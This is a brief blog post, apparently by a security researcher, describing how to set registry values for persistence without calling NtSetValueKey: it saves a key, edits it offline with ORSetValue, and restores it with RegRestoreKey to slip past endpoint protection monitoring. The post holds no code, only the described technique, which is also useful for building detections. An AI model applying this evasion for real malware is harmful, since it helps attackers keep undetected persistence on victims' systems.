1 minute read

Most of the #EPP (Endpoint Protection Platforms) products provide some kind of dynamic monitoring capabilities: Sandboxing, Emulation, Hooking, etc. They monitor when an application calls a library functions ( CreateFile from Kernel32 ) or use syscalls ( mov rax, xxx; syscall ) and based on detection logic used by a product the sample is detected or allowed to continue execution.

If your sample uses RegSetValue/RegSetValueEx or lower level NtSetValueKey functions, it’s highly likely that a #EPP product you are targeting monitors those calls, because typically they are used to achieve persistence via Registry.

There is a way to achieve the same goal without using NtSetValueKey at all. Windows provides Offline Registry Library which can be used to modify a registry hive outside of the active system registry.

We can use RegSaveKey/RegSaveKeyEx or NtSaveKey/NtSaveKeyEx to save the specified key to a registry file and use ORSetValue to set a desired value in the offline registry key:

After modifying the offline registry file, calling RegRestoreKey function replaces a target key with the modified one from the file:

In the end, the result is the same and the desired value is set without using NtSetValueKey function. It’s also less likely that #EPP products monitor Offline Registry Library functions.

whoami: @_qaz_qaz